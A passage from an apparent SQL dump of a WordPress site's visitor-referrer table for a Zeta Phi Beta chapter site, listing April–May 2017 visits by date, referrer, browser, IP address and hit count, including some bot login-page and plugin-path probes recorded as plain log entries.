g/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Chrome','Windows','26.0.1410.64','','5.61.33.81','000',1,0),(3605,'2017-04-25','http://zphiblgz.org/wp-admin/','MSIE','Windows','8.0','','5.61.33.81','000',1,0),(3606,'2017-04-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.59','000',1,0),(3607,'2017-04-25','http://zphiblgz.org','Firefox','Windows','40.1','','77.126.61.228','000',1,0),(3608,'2017-04-25','http://zphiblgz.org','Firefox','Windows','40.1','','145.53.12.99','000',2,0),(3609,'2017-04-25','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','172.82.142.196','000',1,0),(3610,'2017-04-25','http://zphiblgz.org','Firefox','Linux','3.6.8','','95.47.138.134','000',1,0),(3611,'2017-04-25','http://www.bing.com/search?q=member+of+zeta+phi+beta+bio&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','204.79.180.30','000',1,0),(3612,'2017-04-25','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(3613,'2017-04-25','https://www.google.com/','Chrome','Windows','57.0.2987.133','','204.126.132.241','000',2,0),(3614,'2017-04-25','http://zphiblgz.org','MSIE','Windows','6.0','','89.163.152.135','000',1,0),(3615,'2017-04-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(3616,'2017-04-25','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(3617,'2017-04-25','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','69.162.130.78','000',2,0),(3618,'2017-04-25','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','74.91.32.101','000',2,0),(3619,'2017-04-25','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','173.234.44.45','000',2,0),(3620,'2017-04-25','http://zphiblgz.org','Firefox','Windows','40.1','','85.75.252.162','000',2,0),(3621,'2017-04-25','http://zphiblgz.org','Firefox','Windows','27.0','','204.86.30.127','000',2,0),(3622,'2017-04-25','http://zphiblgz.org/','Firefox','Windows','43.0','','77.106.244.246','000',4,0),(3623,'2017-04-25','http://zphiblgz.org','MSIE','Windows','11.0','','185.156.179.225','000',3,0),(3624,'2017-04-25','http://zphiblgz.org/','Chrome','Chrome OS','39.0.2171.96','','212.145.113.219','000',1,0),(3625,'2017-04-25','http://zphiblgz.org/','Chrome','Chrome OS','39.0.2171.96','','36.74.73.103','000',2,0),(3626,'2017-04-25','http://zphiblgz.org','Chrome','Chrome OS','39.0.2171.96','','192.198.80.227','000',2,0),(3627,'2017-04-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.58','000',1,0),(3628,'2017-04-25','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.120.18.140','000',2,0),(3629,'2017-04-25','http://zphiblgz.org','Unknown','Unknown','Unknown','','170.75.159.177','000',2,0),(3630,'2017-04-25','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','74.91.33.53','000',2,0),(3631,'2017-04-25','http://zphiblgz.org','Firefox','Windows','40.1','','175.120.37.69','000',2,0),(3632,'2017-04-25','http://hundejo.com/','Chrome','Linux','37.0.2062.120','','185.170.41.8','000',1,0),(3633,'2017-04-25','http://zphiblgz.org','Firefox','Windows','34.0','','37.1.11.180','000',2,0),(3634,'2017-04-25','http://zphiblgz.org','Firefox','Windows','34.0','','178.161.221.197','000',2,0),(3635,'2017-04-26','http://izhevsk.zrus.org/','MSIE','Windows','6.0','','46.118.115.123','000',5,0),(3636,'2017-04-26','http://store-rx.com/','Opera','Windows','8.00','','46.119.118.191','000',1,0),(3637,'2017-04-26','http://zphiblgz.org','Firefox','Windows','34.0','','141.101.136.30','000',2,0),(3638,'2017-04-26','http://mygameplus.ru/','MSIE','Windows','6.0','','46.119.118.191','000',6,0),(3639,'2017-04-26','http://zphiblgz.org','Firefox','Windows','34.0','','2.62.209.28','000',2,0),(3640,'2017-04-26','http://zphiblgz.org','Firefox','Windows','34.0','','94.228.207.139','000',2,0),(3641,'2017-04-26','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.115','000',1,0),(3642,'2017-04-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.121','000',1,0),(3643,'2017-04-26','http://investyb.com/','Unknown','Unknown','Unknown','','46.118.126.252','000',4,0),(3644,'2017-04-26','http://zphiblgz.org','Firefox','Windows','40.1','','79.8.6.180','000',2,0),(3645,'2017-04-26','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(3646,'2017-04-26','zphiblgz.org','Chrome','Windows','5.0.375.99','','188.138.75.140','000',1,0),(3647,'2017-04-26','http://zphiblgz.org','Firefox','Windows','34.0','','92.46.252.197','000',2,0),(3648,'2017-04-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','87.236.20.140','000',1,0),(3649,'2017-04-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','146.255.26.241','000',1,0),(3650,'2017-04-26','http://zphiblgz.org','Firefox','Windows','34.0','','185.3.34.138','000',2,0),(3651,'2017-04-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.6.53.166','000',1,0),(3652,'2017-04-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','88.102.7.67','000',1,0),(3653,'2017-04-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.219.250.152','000',1,0),(3654,'2017-04-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.238.100.141','000',1,0),(3655,'2017-04-26','http://zphiblgz.org','Firefox','Linux','17.0','','192.198.80.227','000',2,0),(3656,'2017-04-26','http://zphiblgz.org/','Firefox','Windows','44.0','','37.147.223.56','000',2,0),(3657,'2017-04-26','http://zphiblgz.org','Chrome','Macintosh','39.0.2171.95','','198.204.244.34','000',1,0),(3658,'2017-04-26','http://zphiblgz.org','Firefox','Windows','34.0','','95.183.113.32','000',2,0),(3659,'2017-04-26','http://zphiblgz.org','Firefox','Windows','34.0','','82.114.225.148','000',2,0),(3660,'2017-04-26','http://zphiblgz.org','Firefox','Windows','40.1','','79.152.11.10','000',2,0),(3661,'2017-04-26','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwihmfGOqsLTAhXK4iYKHXNmCIIQFgghMAA&url=http%3A%2F%2Fzphiblgz.org%2Fscholarship%2F&usg=AFQjCNGGuWy2KSIOcbzM6-Bb9Xl9Kf1gjQ','MSIE','Windows','11.0','','205.222.248.81','000',7,0),(3662,'2017-04-26','http://zphiblgz.org','Chrome','Windows','53.0.2785.143','','118.39.57.151','000',1,0),(3663,'2017-04-26','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1403.IA3VUrH5injS0cOKHJi--wXOHcZ8crHNR4DypOmldQPBrVuAPlLH9evkh5dcW-Vi.d71905f865da63e273113ca20dccd522ecd59a36&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YOm24rr5dkiDnIjpu2TfUVc&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSTl4bExRX25CZ2tXdWxYN3ZBUng4bHZzNjZKaW5nYUNRZGtSRlJnbzh2Q2s4NFdYN1BiQmRiSzR1MHNnRXdsanRxakNCbF90Vk1fMjNaa2xxM2hDWTFsQnlXd05KRmk2bw&b64e=2&sign=cb406c8a2013e5ed8c7c7b460cb9ea7b&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbioCRKJoyHMOQ0wT70GkoopVfvjPgixsFR-0OKf5_s65C2KJDYuTjNZEophiVLvZq_dfWoZBdvcax9AR0kdNG6uROPdx32sVGVno-PJSK6CCYLUaPCqbbA53nbz2rUftuX&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX9U1h5sqoIO244ExGVGaMbKDKuAuBfgKpZ5kxLvsbRWpgkrqwfhccVRotnv85dzgR4WlQAESdakQ&l10n=ru&cts=1493214865278&mc=2.16225846876','MSIE','Windows','8.0','','37.147.102.162','000',1,0),(3664,'2017-04-26','http://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','188.226.138.236','000',1,0),(3665,'2017-04-26','http://zajm-zalog-krasnodar.ru/','MSIE','Windows','6.0','','46.119.112.125','000',2,0),(3666,'2017-04-26','http://prohoster.info/lir/ipv4','Opera','Windows','8.01','','46.119.112.125','000',2,0),(3667,'2017-04-26','http://zphiblgz.org/','Firefox','Linux','17.0','','104.227.60.60','000',5,0),(3668,'2017-04-26','http://zphiblgz.org','Firefox','Windows','40.1','','123.231.120.2','000',1,0),(3669,'2017-04-26','http://zphiblgz.org','Firefox','Linux','17.0','','23.229.45.172','000',1,0),(3670,'2017-04-26','http://zphiblgz.org','Firefox','Linux','17.0','','192.186.143.119','000',1,0),(3671,'2017-04-26','http://zphiblgz.org','Firefox','Linux','17.0','','45.33.156.210','000',1,0),(3672,'2017-04-26','https://www.google.com/','Chrome','Chrome OS','57.0.2987.146','','73.38.230.60','000',1,0),(3673,'2017-04-26','http://zphiblgz.org','Firefox','Linux','17.0','','45.33.156.102','000',1,0),(3674,'2017-04-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(3675,'2017-04-26','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(3676,'2017-04-26','http://zphiblgz.org','Firefox','Linux','17.0','','23.82.86.67','000',1,0),(3677,'2017-04-26','http://zphiblgz.org','Firefox','Linux','17.0','','166.88.4.70','000',1,0),(3678,'2017-04-26','http://zphiblgz.org','Firefox','Linux','17.0','','23.250.29.18','000',1,0),(3679,'2017-04-26','http://zphiblgz.org','Firefox','Windows','40.1','','86.246.164.79','000',1,0),(3680,'2017-04-26','http://zphiblgz.org','Firefox','Linux','17.0','','107.172.238.144','000',1,0),(3681,'2017-04-26','https://www.google.com/','Edge','Windows','14.14393','','72.81.227.12','000',5,0),(3682,'2017-04-26','http://zphiblgz.org','Firefox','Linux','17.0','','23.105.150.69','000',1,0),(3683,'2017-04-26','http://zphiblgz.org','Chrome','Linux','39.0.2171.99','','166.88.4.203','000',1,0),(3684,'2017-04-26','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiP0bv7hsPTAhWCeSYKHRHiATcQFggoMAE&url=http%3A%2F%2Fzphiblgz.org%2F&usg=AFQjCNHl6iFFa_3VuMKJmTgYMIkup1fP8Q','MSIE','Windows','11.0','','69.195.247.116','000',2,0),(3685,'2017-04-26','http://zphiblgz.org','Safari','Macintosh','5.0.6','','5.9.17.118','000',1,0),(3686,'2017-04-26','http://zphiblgz.org','Firefox','Windows','34.0','','84.22.36.41','000',2,0),(3687,'2017-04-26','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','46.105.31.30','000',1,0),(3688,'2017-04-26','http://zphiblgz.org','Chrome','Linux','39.0.2171.99','','192.198.102.246','000',1,0),(3689,'2017-04-26','http://zphiblgz.org','Chrome','Linux','39.0.2171.99','','192.126.233.159','000',1,0),(3690,'2017-04-26','http://zphiblgz.org','Chrome','Linux','39.0.2171.99','','23.105.150.69','000',1,0),(3691,'2017-04-26','http://prohoster.info/vps/abuzoustojchivye-vps','Unknown','Unknown','Unknown','','37.229.253.129','000',3,0),(3692,'2017-04-26','https://www.google.com/','Safari','iPhone','10.0','','72.81.227.12','000',5,0),(3693,'2017-04-26','http://zphiblgz.org','Firefox','Windows','40.1','','117.243.212.107','000',2,0),(3694,'2017-04-26','http://zphiblgz.org','Firefox','Windows','40.1','','175.139.210.141','000',2,0),(3695,'2017-04-26','http://www.google.com/url?url=http://zphiblgz.org/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwib89zV5MPTAhUh0YMKHaOPDr0QFgg9MAY&sig2=TGh905XbNy9gxjZ9NCx8BQ&usg=AFQjCNHDCTCZ3pbU0WSXNZva20TH3YdnIg','MSIE','Windows','9.0','','155.247.225.149','000',12,0),(3696,'2017-04-26','http://zphiblgz.org','Unknown','Unknown','Unknown','','155.247.225.149','000',1,0),(3697,'2017-04-26','http://zphiblgz.org','Firefox','Windows','34.0','','109.198.172.241','000',2,0),(3698,'2017-04-26','http://vykupavto-krasnodar.ru/','MSIE','Windows','6.0','','178.137.4.41','000',1,0),(3699,'2017-04-27','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(3700,'2017-04-27','http://evrotekhservis.ru/','MSIE','Unknown','7.0b','','46.119.112.125','000',1,0),(3701,'2017-04-27','http://zphiblgz.org','Firefox','Windows','40.1','','49.207.49.47','000',2,0),(3702,'2017-04-27','http://zphiblgz.org','Firefox','Windows','40.1','','117.246.145.199','000',2,0),(3703,'2017-04-27','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',2,0),(3704,'2017-04-27','http://zphiblgz.org','libwww-perl','Unknown','6.15','','185.7.214.52','000',1,0),(3705,'2017-04-27','http://doctormakarova.ru/','Opera','Windows','8.01','','178.137.4.41','000',3,0),(3706,'2017-04-27','http://zphiblgz.org','Chrome','Linux','39.0.2171.99','','192.198.80.227','000',1,0),(3707,'2017-04-27','http://zphiblgz.org','Firefox','Windows','34.0','','178.34.0.230','000',2,0),(3708,'2017-04-27','http://murmansk.zrus.org/','MSIE','Windows','6.0','','46.118.115.123','000',4,0),(3709,'2017-04-27','https://2dm.prohoster.info/','MSIE','Windows','6.0','','37.229.253.129','000',2,0),(3710,'2017-04-27','http://zphiblgz.org','Firefox','Windows','34.0','','109.187.73.237','000',2,0),(3711,'2017-04-27','http://zphiblgz.org/','Chrome','Windows','48.0.2564.109','','37.147.223.56','000',2,0),(3712,'2017-04-27','https://www.google.com/','MSIE','Windows','9.0','','104.156.228.161','000',1,0),(3713,'2017-04-27','http://zphiblgz.org','Firefox','Windows','34.0','','193.106.170.57','000',2,0),(3714,'2017-04-27','http://www.dogpile.com/search/web?fcoid=417&fcop=topnav&fpid=2&om_nextpage=True&q=zeta+phi+beta+sorority+columbia+md&ql=','Firefox','Windows','52.0','','68.134.3.171','000',14,0),(3715,'2017-04-27','http://zphiblgz.org','Firefox','Windows','34.0','','93.78.108.179','000',2,0),(3716,'2017-04-27','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','193.90.12.90','000',1,0),(3717,'2017-04-27','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjBmdjkncXTAhXBJiYKHQiwBRcQFggkMAA&url=http%3A%2F%2Fzphiblgz.org%2Fscholarship%2F&usg=AFQjCNGGuWy2KSIOcbzM6-Bb9Xl9Kf1gjQ','MSIE','Windows','11.0','','205.222.248.81','000',5,0),(3718,'2017-04-27','http://zphiblgz.org','Firefox','Windows','40.1','','219.91.159.226','000',2,0),(3719,'2017-04-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(3720,'2017-04-27','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',2,0),(3721,'2017-04-27','http://zphiblgz.org','Firefox','Windows','40.1','','176.159.153.73','000',1,0),(3722,'2017-04-27','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Safari','iPad','5.1','','5.61.34.51','000',2,0),(3723,'2017-04-27','http://zphiblgz.org','Chrome','Windows','58.0.3029.81','','71.244.248.243','000',3,0),(3724,'2017-04-27','http://lipetsk.zrus.org/','MSIE','Unknown','6.0','','46.118.115.123','000',1,0),(3725,'2017-04-28','http://zphiblgz.org','Firefox','Windows','34.0','','83.239.96.75','000',2,0),(3726,'2017-04-28','http://zphiblgz.org','Firefox','Windows','34.0','','81.30.48.66','000',2,0),(3727,'2017-04-28','http://zphiblgz.org','Firefox','Windows','34.0','','217.118.78.123','000',2,0),(3728,'2017-04-28','http://mnogabukaff.net/','MSIE','Windows','6.0','','46.119.118.191','000',3,0),(3729,'2017-04-28','http://zphiblgz.org','Firefox','Windows','34.0','','31.181.96.232','000',2,0),(3730,'2017-04-28','http://zphiblgz.org','Firefox','Windows','40.1','','51.235.21.138','000',2,0),(3731,'2017-04-28','http://zphiblgz.org','MSIE','Windows','11.0','','37.187.78.81','000',1,0),(3732,'2017-04-28','http://zphiblgz.org','Firefox','Windows','40.1','','87.247.109.145','000',1,0),(3733,'2017-04-28','ZPHIBLGZ.org','Chrome','Windows','5.0.375.99','','91.149.157.145','000',1,0),(3734,'2017-04-28','http://prohoster.info','MSIE','Windows','6.0','','37.229.253.129','000',3,0),(3735,'2017-04-28','http://zphiblgz.org','Firefox','Windows','34.0','','84.22.36.58','000',2,0),(3736,'2017-04-28','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.186.157.146','000',1,0),(3737,'2017-04-28','http://zphiblgz.org','Safari','Macintosh','5.1.9','','5.9.94.207','000',1,0),(3738,'2017-04-28','https://www.google.com/','Safari','iPhone','10.0','','100.36.69.101','000',1,0),(3739,'2017-04-28','http://zphiblgz.org','Safari','iPhone','9.0','','124.236.177.158','000',1,0),(3740,'2017-04-28','http://zphiblgz.org','Safari','iPhone','9.0','','60.1.120.41','000',1,0),(3741,'2017-04-28','https://atleticpharm.org/','Unknown','Unknown','Unknown','','178.137.4.41','000',2,0),(3742,'2017-04-28','http://oballergiya.ru/','MSIE','Windows','6.0','','178.137.4.41','000',1,0),(3743,'2017-04-28','http://zphiblgz.org','Firefox','Windows','40.1','','82.114.76.158','000',1,0),(3744,'2017-04-28','http://zphiblgz.org','Firefox','Windows','40.1','','178.209.8.249','000',2,0),(3745,'2017-04-28','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','172.241.151.23','000',1,0),(3746,'2017-04-28','http://zphiblgz.org','Firefox','Windows','34.0','','217.118.93.84','000',2,0),(3747,'2017-04-28','http://zphiblgz.org','Firefox','Windows','34.0','','94.25.176.42','000',2,0),(3748,'2017-04-28','http://zphiblgz.org','Firefox','Windows','40.1','','183.82.21.197','000',1,0),(3749,'2017-04-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(3750,'2017-04-28','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(3751,'2017-04-28','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.117.10','000',2,0),(3752,'2017-04-28','http://zphiblgz.org','Firefox','Windows','40.1','','121.86.223.241','000',1,0),(3753,'2017-04-28','http://zphiblgz.org','Firefox','Windows','34.0','','92.37.142.160','000',2,0),(3754,'2017-04-28','http://zphiblgz.org/event/winetasting/','Chrome','Windows','48.0.2564.97','','31.24.226.138','000',1,0),(3755,'2017-04-28','http://krasnodar.nodup.ru/','Unknown','Unknown','Unknown','','46.119.112.125','000',3,0),(3756,'2017-04-28','http://xn--80aebbcbcdemfkhba4byaehoejh8dza3v.xn--p1ai/','Opera','Windows','9.00','','46.119.112.125','000',1,0),(3757,'2017-04-28','http://www.bing.com/search?q=www.zetaphibeta+lambda+zeta&src=IE-TopResult&FORM=IETR02&conversationid=','MSIE','Windows','11.0','','50.162.72.67','000',1,0),(3758,'2017-04-28','http://yoshkarola.zrus.org/','Opera','Windows','9.00','','46.118.115.123','000',1,0),(3759,'2017-04-29','http://zphiblgz.org','Firefox','Windows','34.0','','79.173.127.19','000',2,0),(3760,'2017-04-29','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','61.106.77.51','000',1,0),(3761,'2017-04-29','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','1.54.204.26','000',1,0),(3762,'2017-04-29','http://tagil.zrus.org/','Unknown','Unknown','Unknown','','46.119.118.191','000',2,0),(3763,'2017-04-29','http://khabarovsk.zrus.org/','Opera','Windows','8.00','','46.119.118.191','000',3,0),(3764,'2017-04-29','http://zphiblgz.org','Firefox','Windows','40.1','','157.51.6.156','000',1,0),(3765,'2017-04-29','https://www.google.com/','Chrome','Android','57.0.2987.132','','98.233.251.4','000',1,0),(3766,'2017-04-29','http://zphiblgz.org','Firefox','Windows','34.0','','109.226.102.128','000',2,0),(3767,'2017-04-29','http://zphiblgz.org','Chrome','Linux','57.0.2987.110','','46.229.170.197','000',1,0),(3768,'2017-04-29','http://zphiblgz.org','Firefox','Windows','52.0','','46.229.170.197','000',1,0),(3769,'2017-04-29','http://zphiblgz.org','Firefox','Windows','34.0','','5.166.76.31','000',2,0),(3770,'2017-04-29','http://xn-----6kccaibs5cb8afhjrfmix2n.xn--p1ai/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(3771,'2017-04-29','http://zphiblgz.org/wp-content/plugins/ubh/up.php','Chrome','Windows','42.0.2311.152','','163.172.108.151','000',1,0),(3772,'2017-04-29','http://arenda-avtoprokat-krasnodar.ru/','MSIE','Windows','4.01','','46.119.118.191','000',2,0),(3773,'2017-04-29','http://ed-shop01.ru/','MSIE','Windows','5.5','','46.119.112.125','000',2,0),(3774,'2017-04-29','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','104.254.244.80','000',9,0),(3775,'2017-04-29','http://zphiblgz.org','Chrome','Windows','37.0.2049.0','','104.254.244.80','000',1,0),(3776,'2017-04-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.254.244.80','000',1,0),(3777,'2017-04-29','https://murmansk.afora.ru/','MSIE','Windows','6.0','','46.118.115.123','000',1,0),(3778,'2017-04-29','https://www.google.com/','Safari','iPhone','10.0','','72.81.227.12','000',3,0),(3779,'2017-04-29','http://zphiblgz.org','Firefox','Windows','34.0','','178.120.174.131','000',2,0),(3780,'2017-04-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','178.33.160.252','000',1,0),(3781,'2017-04-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.144.109.14','000',1,0),(3782,'2017-04-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','193.143.77.10','000',1,0),(3783,'2017-04-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','31.24.33.250','000',1,0),(3784,'2017-04-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.27.5','000',1,0),(3785,'2017-04-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(3786,'2017-04-29','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(3787,'2017-04-29','http://zphiblgz.org','MSIE','Windows','11.0','','37.187.78.81','000',1,0),(3788,'2017-04-29','http://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','146.185.169.201','000',4,0),(3789,'2017-04-29','https://2dm.prohoster.info/domain-registration/domain-whois-lookup.php','MSIE','Windows','6.0','','37.229.253.129','000',1,0),(3790,'2017-04-29','http://zphiblgz.org','Firefox','Windows','34.0','','83.149.21.24','000',2,0),(3791,'2017-04-29','https://www.google.com/','Safari','iPhone','10.0','','107.77.90.94','000',1,0),(3792,'2017-04-29','http://cheboksary.zrus.org/','MSIE','Unknown','6.0','','46.118.115.123','000',3,0),(3793,'2017-04-29','https://www.google.com/','Chrome','Macintosh','58.0.3029.81','','198.90.109.27','000',1,0),(3794,'2017-04-29','http://zphiblgz.org','Firefox','Windows','34.0','','171.4.41.176','000',2,0),(3795,'2017-04-30','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','9.0','','5.61.34.51','000',1,0),(3796,'2017-04-30','http://zphiblgz.org/wp-admin/','Safari','iPad','5.1','','5.61.34.51','000',1,0),(3797,'2017-04-30','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','46.183.218.199','000',1,0),(3798,'2017-04-30','zphiblgz.org','Chrome','Windows','5.0.375.99','','173.230.251.210','000',1,0),(3799,'2017-04-30','http://zphiblgz.org','Firefox','Windows','34.0','','109.168.186.75','000',2,0),(3800,'2017-04-30','http://zphiblgz.org','Chrome','Macintosh','40.0.2214.93','','52.53.165.22','000',1,0),(3801,'2017-04-30','http://oballergiya.ru/','MSIE','Windows','6.0','','37.229.253.129','000',6,0),(3802,'2017-04-30','http://zphiblgz.org','Firefox','Windows','40.1','','41.96.48.127','000',1,0),(3803,'2017-04-30','zphiblgz.org','Chrome','Windows','5.0.375.99','','144.76.91.10','000',1,0),(3804,'2017-04-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.166.139.71','000',1,0),(3805,'2017-04-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',2,0),(3806,'2017-04-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.12','000',2,0),(3807,'2017-04-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.59.254.151','000',1,0),(3808,'2017-04-30','http://kursk.zrus.org/','Unknown','Unknown','Unknown','','46.118.115.123','000',3,0),(3809,'2017-04-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.42.4','000',1,0),(3810,'2017-04-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.101.137','000',1,0),(3811,'2017-04-30','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','144.217.80.113','000',1,0),(3812,'2017-04-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.20','000',2,0),(3813,'2017-04-30','http://zphiblgz.org','Firefox','Windows','40.1','','200.0.42.107','000',2,0),(3814,'2017-04-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',2,0),(3815,'2017-04-30','http://zphiblgz.org','Firefox','Windows','34.0','','93.157.253.63','000',2,0),(3816,'2017-04-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',1,0),(3817,'2017-04-30','http://zphiblgz.org','Firefox','Windows','34.0','','213.87.151.226','000',2,0),(3818,'2017-04-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.199.130.188','000',1,0),(3819,'2017-04-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.63.229','000',1,0),(3820,'2017-04-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.245.138','000',1,0),(3821,'2017-04-30','http://www.zphibmaryland.org/chapters/','Chrome','Android','57.0.2987.132','','76.100.115.177','000',2,0),(3822,'2017-04-30','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.226.52.75','000',1,0),(3823,'2017-04-30','http://zphiblgz.org','Firefox','Windows','34.0','','78.106.171.138','000',2,0),(3824,'2017-04-30','http://zphiblgz.org','Firefox','Windows','34.0','','85.115.224.221','000',2,0),(3825,'2017-04-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(3826,'2017-04-30','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(3827,'2017-04-30','http://zphiblgz.org','Firefox','Windows','40.1','','202.65.129.229','000',2,0),(3828,'2017-04-30','http://zphiblgz.org','Firefox','Windows','40.1','','58.179.167.189','000',1,0),(3829,'2017-04-30','https://www.google.com/','Safari','iPhone','10.0','','107.77.70.53','000',1,0),(3830,'2017-04-30','http://zphiblgz.org','MSIE','Windows','11.0','','37.187.78.81','000',1,0),(3831,'2017-04-30','http://mnogabukaff.net/','Unknown','Unknown','Unknown','','46.119.118.191','000',2,0),(3832,'2017-04-30','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','174.59.117.207','000',1,0),(3833,'2017-04-30','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','101.51.224.151','000',1,0),(3834,'2017-04-30','http://udsgame.online/','MSIE','Windows','5.5','','178.137.4.41','000',1,0),(3835,'2017-04-30','https://www.google.com/','Safari','iPhone','10.0','','107.77.70.26','000',1,0),(3836,'2017-04-30','http://investyb.com/','MSIE','Windows','6.0','','178.137.4.41','000',2,0),(3837,'2017-04-30','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(3838,'2017-04-30','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.113','000',1,0),(3839,'2017-04-30','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwis_ru11M3TAhXCWSYKHe1FAiYQFghbMAk&url=http%3A%2F%2Fzphiblgz.org%2F&usg=AFQjCNHl6iFFa_3VuMKJmTgYMIkup1fP8Q','MSIE','Windows','11.0','','73.201.199.79','000',9,0),(3840,'2017-04-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.151.47','000',1,0),(3841,'2017-04-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','212.21.66.6','000',1,0),(3842,'2017-04-30','http://zphiblgz.org','Firefox','Windows','34.0','','31.181.117.3','000',2,0),(3843,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.221.161.114','000',1,0),(3844,'2017-05-01','http://zphiblgz.org/','Firefox','Windows','7.0.1','','89.38.208.57','000',1,0),(3845,'2017-05-01','http://zphiblgz.org','Firefox','Windows','34.0','','94.29.64.220','000',2,0),(3846,'2017-05-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.42.4','000',1,0),(3847,'2017-05-01','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.37.18','000',1,0),(3848,'2017-05-01','zphiblgz.org','Chrome','Windows','5.0.375.99','','178.210.90.90','000',1,0),(3849,'2017-05-01','zphiblgz.